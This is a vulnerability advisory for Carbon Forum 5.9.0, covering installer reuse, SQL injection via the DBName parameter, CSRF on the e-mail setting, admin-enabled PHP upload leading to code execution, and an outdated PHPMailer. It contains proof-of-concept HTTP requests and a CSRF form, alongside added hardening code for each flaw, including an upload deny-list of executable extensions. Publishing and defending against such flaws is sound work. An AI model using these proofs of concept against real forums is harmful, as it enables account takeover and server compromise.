Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection

Reported by bRpsd, 24 Jun 2024. Source: Packet Storm (packetstormsecurity.com).

Carbon Forum 5.9.0 Multiple Exploits, CSRF, SQL Injection

Code
{-} Title => Carbon Forum 5.9.0 - Multiple Exploits
{-} Author => bRpsd [[email protected]]  
{-} Date Release => 22 June, 2024  
{-} Vendor => Carbon Forum <= 5.9.0  
Homepage => https://www.94cb.com/  
Download => https://github.com/lincanbin/Carbon-Forum  
Vulnerable Versions => <= 5.9.0
Tested Version => 5.9.0 on an XAMPP server.
  
  
  
#######################################################################################  
Vulnerability #1 : Reset Administrator Password & Database settings
File Path: http://localhost/Carbon-Forum/install/
INFO: The install folder is left in place after installation and the installer does not check whether setup has already been completed. An unauthenticated attacker can rerun it, point the forum at a new database (or overwrite the configured one) and then obtain the administrator account simply by registering the first user on the fresh installation.
#######################################################################################  
  
  
  
#######################################################################################  
Vulnerability #2 : SQL Injection  
Vulnerable Code: /Carbon-Forum/install/index.php
The only parameter that reaches a SQL statement unescaped is DBName: it is concatenated into CREATE DATABASE as an identifier. The INFORMATION_SCHEMA lookup just above binds the same value with a PDO placeholder and is not injectable; DBHost, DBUser and DBPassword go into the PDO connection, not into a query.
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $fp = fopen(__DIR__ . '/database.sql', "r") or die("SQL文件无法打开。 The SQL File could not be opened.");
    //dobefore
    if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) {
        $Language = $_POST['Language'];
        $DBHost = $_POST['DBHost'];
        $DBName = $_POST['DBName'];
        $DBUser = $_POST['DBUser'];
        $DBPassword = $_POST['DBPassword'];
        $SearchServer = $_POST['SearchServer'];
        $SearchPort = $_POST['SearchPort'];
        $EnableMemcache = $_POST['EnableMemcache'];
        $MemCachePrefix = $_POST['MemCachePrefix'];
    } else {
        die("An Unexpected Error Occured!");
    }
    //$WebsitePath = $_POST['WebsitePath'];
    $WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
    if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) {
        $WebsitePath = $WebsitePathMatch[1];
    } else {
        $WebsitePath = '';
    }
    // Initialise the database access class
    require('../library/PDO.class.php');
    $DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword);
    // Value context: DBName is bound as a parameter here, which is safe
    $DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName));
    if (empty($DatabaseExist)) {
        // Sink: user-controlled DBName is concatenated into the statement as a raw identifier
        $DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";");
    }
    // ... (rest of the installer)
  
POC Request:  
POST http://localhost/Carbon-Forum/install/?  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br, zstd  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 173  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/Carbon-Forum/install/  
Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / Install  
  
Response:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1
You can find the error back in the log.
Note: the 1064 error "near ''" is what MariaDB returns for the statement CREATE DATABASE IF NOT EXISTS ; that results from the empty DBName in this request. The quote in DBUser only reaches the connection credentials, so a payload aimed at the concatenation shown above belongs in the DBName parameter.
#######################################################################################  
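As an added example, not code from Carbon Forum or from the advisory author, the following hardened prologue for install/index.php addresses both findings above: it refuses to run once an install.lock marker exists (the marker name is this example's assumption; deleting /install after setup remains the stronger fix), and it validates and backtick-quotes DBName before CREATE DATABASE, because identifiers cannot be bound as PDO parameters the way the INFORMATION_SCHEMA lookup binds a value. It assumes the Db class with the constructor, single() and query() calls seen in the vulnerable snippet; validateDatabaseName() and quoteIdentifier() are the example's own names.

```php
<?php
// Added example (not Carbon Forum code): hardened prologue for install/index.php.
// Assumes the Db class from library/PDO.class.php with the constructor, single()
// and query() used in the vulnerable snippet; install.lock is this example's name.
declare(strict_types=1);

// 1. Refuse to run once installation has completed. The installer writes the
//    lock file on success; removing the /install directory is still recommended.
$lockFile = __DIR__ . '/install.lock';
if (file_exists($lockFile)) {
    http_response_code(403);
    exit('Installation is already complete. Delete install.lock to reinstall.');
}

// 2. Only accept identifier-safe database names. MySQL/MariaDB schema names are
//    at most 64 characters; restricting to [A-Za-z0-9_] rules out quotes,
//    semicolons, comment sequences and backticks before the name reaches SQL.
function validateDatabaseName(string $name): string
{
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $name)) {
        throw new InvalidArgumentException('Invalid database name');
    }
    return $name;
}

// 3. Quote the identifier anyway. PDO placeholders only work for values, so the
//    name is backtick-quoted with embedded backticks doubled. With the regex
//    above there are none; this is defence in depth.
function quoteIdentifier(string $name): string
{
    return '`' . str_replace('`', '``', $name) . '`';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    foreach (['Language', 'DBHost', 'DBName', 'DBUser', 'DBPassword'] as $field) {
        if (!isset($_POST[$field]) || !is_string($_POST[$field])) {
            http_response_code(400);
            exit('Missing parameter: ' . $field);
        }
    }

    try {
        $DBName = validateDatabaseName($_POST['DBName']);
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        exit($e->getMessage());
    }

    require '../library/PDO.class.php';
    $DB = new Db($_POST['DBHost'], 3306, '', $_POST['DBUser'], $_POST['DBPassword']);

    // Value context: a bound parameter is the right tool, as in the original.
    $DatabaseExist = $DB->single(
        'SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName',
        ['DBName' => $DBName]
    );
    if (empty($DatabaseExist)) {
        // Identifier context: validated and quoted, never concatenated raw.
        $DB->query('CREATE DATABASE IF NOT EXISTS ' . quoteIdentifier($DBName) . ';');
    }

    // ... rest of the installation. On success, mark it done:
    // file_put_contents($lockFile, date('c'));
}
```

The lock file only closes the window for a forgotten directory; the post-install instructions should still tell operators to delete /install, and a deployment check can simply request /install/ and treat anything other than 403 or 404 as a finding.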
  
  
################################################################################################################  
Vulnerability #3 : CSRF - Change a user's e-mail address
File Path: http://localhost/Carbon-Forum/settings
Method: POST
Parameter : UserMail
Code: Carbon-Forum/controller/settings.php
  
  
Vulnerable code (the handler copies the POSTed fields straight into the profile update; nothing on this path checks an anti-CSRF token, so any page a logged-in victim visits can submit the form below on their behalf):
case 'UpdateUserInfo':
    $CurUserInfo['UserSex'] = intval(Request('POST', 'UserSex', 0));
    $CurUserInfo['UserMail'] = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail'];
    $CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage']));
    $CurUserInfo['UserIntro'] = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro']));
    $UpdateUserInfoResult = UpdateUserInfo(array(
        'UserSex' => $CurUserInfo['UserSex'],
        'UserMail' => $CurUserInfo['UserMail'],
        'UserHomepage' => $CurUserInfo['UserHomepage'],
        'UserIntro' => $CurUserInfo['UserIntro']
    ));
    if ($UpdateUserInfoResult) {
        $UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully'];
    // ...

POC (attacker-hosted page; a logged-in victim who submits it has their e-mail address replaced with the attacker's):
<form method='POST' action='http://localhost/Carbon-Forum/settings'>  
<input type="hidden" name="Action" value="UpdateUserInfo">  
<input type="hidden" name="UserSex" value="0">  
<input type="hidden" name="UserMail" value="[email protected]">  
<input type="hidden" name="UserHomepage" value="">  
<input type="hidden" name="UserIntro" value="">  
<input type='submit' value='submit'>  
</form>  
################################################################################################################  
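Added example, not Carbon Forum code: synchronizer-token CSRF protection for a state-changing handler such as UpdateUserInfo above. It assumes PHP sessions are in use; csrfToken(), csrfTokenIsValid(), csrfField() and handleUpdateUserInfo() are the example's own names, and persisting the result through UpdateUserInfo() is left to the caller as in the snippet.

```php
<?php
// Added example (not Carbon Forum code): synchronizer-token CSRF protection.
// Function names are the example's own; it assumes PHP sessions.
declare(strict_types=1);

// Issue one token per session: 32 random bytes, hex-encoded, kept server-side.
function csrfToken(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a plain == would be type-juggled and leak timing.
function csrfTokenIsValid(?string $submitted): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// Render side: every state-changing form carries the hidden token field.
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Handler side: reject before any field is read or written. The attacker's
// cross-site form cannot include this value because it never sees the
// victim's session, so the forged POST fails here.
function handleUpdateUserInfo(array $post, array $curUserInfo): array
{
    if (!csrfTokenIsValid($post['csrf_token'] ?? null)) {
        http_response_code(403);
        throw new RuntimeException('Invalid or missing CSRF token');
    }

    // Second line of defence: if the browser sent an Origin header, it must
    // match this host. Browsers send Origin on cross-site form POSTs.
    $origin = $_SERVER['HTTP_ORIGIN'] ?? null;
    $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://';
    $self   = $scheme . ($_SERVER['HTTP_HOST'] ?? '');
    if ($origin !== null && $origin !== $self) {
        http_response_code(403);
        throw new RuntimeException('Cross-origin request rejected');
    }

    // Same e-mail validation intent as the original, with the built-in filter.
    $newMail = $post['UserMail'] ?? $curUserInfo['UserMail'];
    if (!is_string($newMail) || filter_var($newMail, FILTER_VALIDATE_EMAIL) === false) {
        $newMail = $curUserInfo['UserMail'];
    }
    $curUserInfo['UserMail'] = $newMail;
    return $curUserInfo; // caller persists via UpdateUserInfo(...) as in the original
}
```

Setting the session cookie with SameSite=Lax (session_set_cookie_params() accepts a 'samesite' key on PHP 7.3 and later) stops the plain cross-site form POST in modern browsers as well, but it is a browser-side control and does not replace the token check. An e-mail change is also a good candidate for re-authentication or a confirmation link sent to the new address.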
  
  
#######################################################################################  
Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated]
Info: An administrator can edit the upload whitelist (the *AllowFiles arrays of the UEditor upload configuration) under dashboard -> Parameter. The request below saves that configuration; once an executable extension such as .php is added to fileAllowFiles, the editor's upload action will store server-side code under /upload/file/, which is the remote code execution claimed here. Administrator privileges are required.
POC POST:
http://localhost/Carbon-Forum/dashboard#dashboard4  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br, zstd  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 14662  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/Carbon-Forum/dashboard  
Cookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktop  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
(Body shown unfolded and with the configuration comments translated from Chinese; the original is sent as a single line.)
Action=Parameter
&UploadParameters=
/* Configuration for front-end/back-end communication; only multi-line comments are allowed */
{
    /* Image upload settings */
    "imageActionName": "uploadimage", /* action name that performs the image upload */
    "imageFieldName": "upfile", /* form field name for the submitted image */
    "imageMaxSize": 4096000, /* upload size limit, in bytes */
    "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* allowed image formats */
    "imageCompressEnable": true, /* whether to compress images, default true */
    "imageCompressBorder": 1600, /* longest-edge limit for image compression */
    "imageInsertAlign": "none", /* float mode of the inserted image */
    "imageUrlPrefix": "", /* URL prefix for image access */
    "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* save path; path and file-name format are customisable */
    /* (unknown) is replaced with the original file name; beware of Chinese character encoding problems when using it */
    /* {rand:6} is replaced with a random number; the trailing digit is the number of digits */
    /* {time} is replaced with a timestamp */
    /* {yyyy} is replaced with the four-digit year */
    /* {yy} is replaced with the two-digit year */
    /* {mm} is replaced with the two-digit month */
    /* {dd} is replaced with the two-digit day */
    /* {hh} is replaced with the two-digit hour */
    /* {ii} is replaced with the two-digit minute */
    /* {ss} is replaced with the two-digit second */
    /* Illegal characters: \ : * ? " < > | */
    /* See the online documentation for details: fex.baidu.com/ueditor/#use-format_upload_filename */

    /* Scrawl (doodle) image upload settings */
    "scrawlActionName": "uploadscrawl", /* action name that performs the scrawl upload */
    "scrawlFieldName": "upfile", /* form field name for the submitted image */
    "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* save path; path and file-name format are customisable */
    "scrawlMaxSize": 2048000, /* upload size limit, in bytes */
    "scrawlUrlPrefix": "", /* URL prefix for image access */
    "scrawlInsertAlign": "none",
    "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"],

    /* Screenshot tool upload */
    "snapscreenActionName": "uploadimage", /* action name that performs the screenshot upload */
    "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* save path; path and file-name format are customisable */
    "snapscreenUrlPrefix": "", /* URL prefix for image access */
    "snapscreenInsertAlign": "none", /* float mode of the inserted image */

    /* Remote image fetching */
    "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"],
    "catcherActionName": "catchimage", /* action name that fetches remote images */
    "catcherFieldName": "source", /* form field name for the submitted image list */
    "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* save path; path and file-name format are customisable */
    "catcherUrlPrefix": "", /* URL prefix for image access */
    "catcherMaxSize": 2048000, /* upload size limit, in bytes */
    "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* allowed fetched image formats */

    /* Video upload settings */
    "videoActionName": "uploadvideo", /* action name that performs the video upload */
    "videoFieldName": "upfile", /* form field name for the submitted video */
    "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* save path; path and file-name format are customisable */
    "videoUrlPrefix": "", /* URL prefix for video access */
    "videoMaxSize": 20480000, /* upload size limit, in bytes, default 20 MB */
    "videoAllowFiles": [".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* allowed video formats */

    /* File upload settings */
    "fileActionName": "uploadfile", /* action name in the controller that performs the upload */
    "fileFieldName": "upfile", /* form field name for the submitted file */
    "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* save path; path and file-name format are customisable */
    "fileUrlPrefix": "", /* URL prefix for file access */
    "fileMaxSize": 2048000, /* upload size limit, in bytes, default 2 MB */
    "fileAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"], /* allowed file formats */

    /* List images in the given directory */
    "imageManagerActionName": "listimage", /* action name for image management */
    "imageManagerListPath": "/upload/image/", /* directory whose images are listed */
    "imageManagerListSize": 60, /* number of files listed per request */
    "imageManagerUrlPrefix": "", /* URL prefix for image access */
    "imageManagerInsertAlign": "none", /* float mode of the inserted image */
    "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* file types listed */

    /* List files in the given directory */
    "fileManagerActionName": "listfile", /* action name for file management */
    "fileManagerListPath": "/upload/file/", /* directory whose files are listed */
    "fileManagerUrlPrefix": "", /* URL prefix for file access */
    "fileManagerListSize": 60, /* number of files listed per request */
    "fileManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"] /* file types listed */
}
&TextFilterParameter=
/* Keyword filter configuration; only multi-line comments are allowed */
{
    /* Every keyword supports regular expressions; too many filters hurt performance.
       "fuck" : "f**k",
       means content containing "fuck" is posted with it rewritten to "f**k".
       "negro" : [false, 30],
       Don't issue text with "negro", or it will freeze for 30 seconds.
       "蛤" : [false, 30],
       forbids posting content containing "蛤"; a user who tries is silenced for 30 seconds.
       "negro" : ["black", 30],
       "包子" : ["维尼", 30],
       means content containing "包子" is rewritten to "维尼", and after it is posted the user must wait another 30 seconds before posting again. */
    /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包子" : ["维尼", 30] */
}
&submit=Save settings
  
#######################################################################################  
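Added example, not Carbon Forum or UEditor code: a server-side extension guard that the upload handler applies on top of the dashboard-editable *AllowFiles lists, so that an administrator (or an attacker holding an administrator session) cannot widen the whitelist to executable types. EXECUTABLE_EXTENSIONS, DEFAULT_UPLOAD_EXTENSIONS, uploadNameIsAllowed() and storeUpload() are the example's own names; it assumes PHP 7.4 or later.

```php
<?php
// Added example (not Carbon Forum or UEditor code): hard server-side limits on
// upload file types that the JSON configuration cannot override. Names are the
// example's own; assumes PHP 7.4+ for arrow functions.
declare(strict_types=1);

// Extensions the web server or PHP would execute, or that are dangerous to serve
// from an upload directory (HTML/SVG give stored XSS). Hard-coded on purpose:
// editing the dashboard configuration must not be able to widen this list.
const EXECUTABLE_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phps', 'pht', 'phtml', 'phar',
    'inc', 'cgi', 'pl', 'py', 'sh', 'asp', 'aspx', 'jsp', 'jspx',
    'htaccess', 'htm', 'html', 'svg',
];

// The types the site actually needs. The configured list is intersected with
// this, so configuration can only narrow the set, never extend it.
const DEFAULT_UPLOAD_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif', 'bmp', 'pdf', 'txt', 'zip'];

/**
 * Decide whether $originalName may be stored. Every dotted component after the
 * stem is checked, not only the last one, so "shell.php.jpg" is rejected too.
 */
function uploadNameIsAllowed(string $originalName, array $configuredAllow): bool
{
    if (strpos($originalName, "\0") !== false) {
        return false;                                   // null byte: never legitimate
    }
    $base = basename(str_replace('\\', '/', $originalName));
    if ($base === '' || $base[0] === '.') {
        return false;                                   // empty or dotfile (.htaccess)
    }
    $parts = explode('.', strtolower($base));
    array_shift($parts);                                // drop the stem
    if ($parts === []) {
        return false;                                   // no extension at all
    }
    foreach ($parts as $ext) {
        if (in_array($ext, EXECUTABLE_EXTENSIONS, true)) {
            return false;                               // hard deny-list wins over config
        }
    }
    $allowed = array_intersect(
        array_map(fn($e) => strtolower(ltrim($e, '.')), $configuredAllow),
        DEFAULT_UPLOAD_EXTENSIONS
    );
    return in_array(end($parts), $allowed, true);
}

/**
 * Store a $_FILES entry under a server-chosen random name, so the client's file
 * name never reaches the filesystem, and sanity-check image content.
 */
function storeUpload(array $file, string $uploadDir, array $configuredAllow): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    if (!uploadNameIsAllowed($file['name'], $configuredAllow)) {
        throw new RuntimeException('File type not allowed');
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (in_array($ext, ['png', 'jpg', 'jpeg', 'gif', 'bmp'], true)
        && @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not a valid image');
    }
    $target = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store file');
    }
    return $target;
}

// Usage (file names constructed for illustration; $config would be the parsed
// fileAllowFiles array from the saved UploadParameters):
// uploadNameIsAllowed('photo.jpg', $config);
// uploadNameIsAllowed('shell.php', $config);
// uploadNameIsAllowed('shell.php.jpg', $config);
```

The guard should be paired with a web-server rule that disables script execution under /upload (for Apache, php_admin_flag engine off in that directory; for nginx, a location block without a fastcgi_pass), so that a bypass of the name check still does not yield code execution.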
  
  
  
#######################################################################################  
Vulnerability #5 : Vulnerable PHPMailer library
File: /Carbon-Forum/library/PHPMailer.class.php
Version: $Version = '5.2.16';
Note: PHPMailer 5.2.16 predates the fixes for CVE-2016-10033 (remote code execution through the sender address passed to mail(), fixed in 5.2.18) and its bypass CVE-2016-10045 (fixed in 5.2.20). The bundled copy should be replaced with a current PHPMailer release.
#######################################################################################  
